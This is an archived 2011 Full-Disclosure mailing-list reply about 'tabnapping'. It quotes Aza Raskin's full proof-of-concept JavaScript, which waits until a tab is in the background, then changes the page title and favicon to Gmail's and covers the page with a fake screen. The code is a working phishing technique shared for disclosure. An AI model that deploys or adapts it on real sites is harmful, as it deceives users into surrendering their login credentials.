[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <BANLkTinSTFLQP99fCaJtnMm2cVmxZOosfQ@mail.gmail.com>
Date: Wed, 8 Jun 2011 22:23:26 -0500
From: adam <adam@...sy.net>
To: t0hitsugu <tohitsugu@...il.com>
Cc: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Re: tabnapping
For anyone who is interested, Aza's original paper/demo can be found
here<http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/>
.
On Wed, Jun 8, 2011 at 10:12 PM, t0hitsugu <tohitsugu@...il.com> wrote:
> I just stumbled across this (credit goes to
> http://www.pjlantz.com/2010/05/tabnapping.html and Aza Raskin) and while
> rough, certainly has potential given the right circumstances.
>
> I added a quick PoC, though I'm on a NAT and can't provide you a working
> link atm, though it seemed to work fine using the latest Fenic beta. That
> being said, it also worked on my box using a variety of user agents, so I'm
> not certain this is even a mobile-specific problem.
>
> The malicious script is as follows:
>
> >
> > /*
> > Copyright (c) 2010 Aza Raskin
> > http://azarask.in
> >
> > Permission is hereby granted, free of charge, to any person
> > obtaining a copy of this software and associated documentation
> > files (the "Software"), to deal in the Software without
> > restriction, including without limitation the rights to use,
> > copy, modify, merge, publish, distribute, sublicense, and/or sell
> > copies of the Software, and to permit persons to whom the
> > Software is furnished to do so, subject to the following
> > conditions:
> >
> > The above copyright notice and this permission notice shall be
> > included in all copies or substantial portions of the Software.
> > */
> >
> >
> > (function(){
> >
> > var TIMER = null;
> > var HAS_SWITCHED = false;
> >
> > // Events
> > window.onblur = function(){
> > TIMER = setTimeout(changeItUp, 5000);
> > }
> >
> > window.onfocus = function(){
> > if(TIMER) clearTimeout(TIMER);
> > }
> >
> > // Utils
> > function setTitle(text){ document.title = text; }
> >
> > // This favicon object rewritten from:
> > // Favicon.js - Change favicon dynamically [
> http://ajaxify.com/run/favicon].
> > // Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox
> and Opera.
> >
> > favicon = {
> > docHead: document.getElementsByTagName("head")[0],
> > set: function(url){
> > this.addLink(url);
> > },
> >
> > addLink: function(iconURL) {
> > var link = document.createElement("link");
> > link.type = "image/x-icon";
> > link.rel = "shortcut icon";
> > link.href = iconURL;
> > this.removeLinkIfExists();
> > this.docHead.appendChild(link);
> > },
> >
> > removeLinkIfExists: function() {
> > var links = this.docHead.getElementsByTagName("link");
> > for (var i=0; i<links.length; i++) {
> > var link = links[i];
> > if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
> > this.docHead.removeChild(link);
> > return; // Assuming only one match at most.
> > }
> > }
> > },
> >
> > get: function() {
> > var links = this.docHead.getElementsByTagName("link");
> > for (var i=0; i<links.length; i++) {
> > var link = links[i];
> > if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
> > return link.href;
> > }
> > }
> > }
> > };
> >
> >
> > function createShield(){
> > div = document.createElement("div");
> > div.style.position = "fixed";
> > div.style.top = 0;
> > div.style.left = 0;
> > div.style.backgroundColor = "white";
> > div.style.width = "100%";
> > div.style.height = "100%";
> > div.style.textAlign = "center";
> > document.body.style.overflow = "hidden";
> >
> > img = document.createElement("img");
> > img.style.paddingTop = "15px";
> > img.src = "
> http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png";
> >
> > var oldTitle = document.title;
> > var oldFavicon = favicon.get() || "/favicon.ico";
> >
> > div.appendChild(img);
> > document.body.appendChild(div);
> > img.onclick = function(){
> > div.parentNode.removeChild(div);
> > document.body.style.overflow = "auto";
> > setTitle(oldTitle);
> > favicon.set(oldFavicon)
> > }
> >
> >
> > }
> >
> > function changeItUp(){
> > if( HAS_SWITCHED == false ){
> > createShield("https://mail.google.com");
> > setTitle( "Gmail: Email from Google");
> > favicon.set("https://mail.google.com/favicon.ico");
> > HAS_SWITCHED = true;
> > }
> > }
> >
> >
> > })();
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists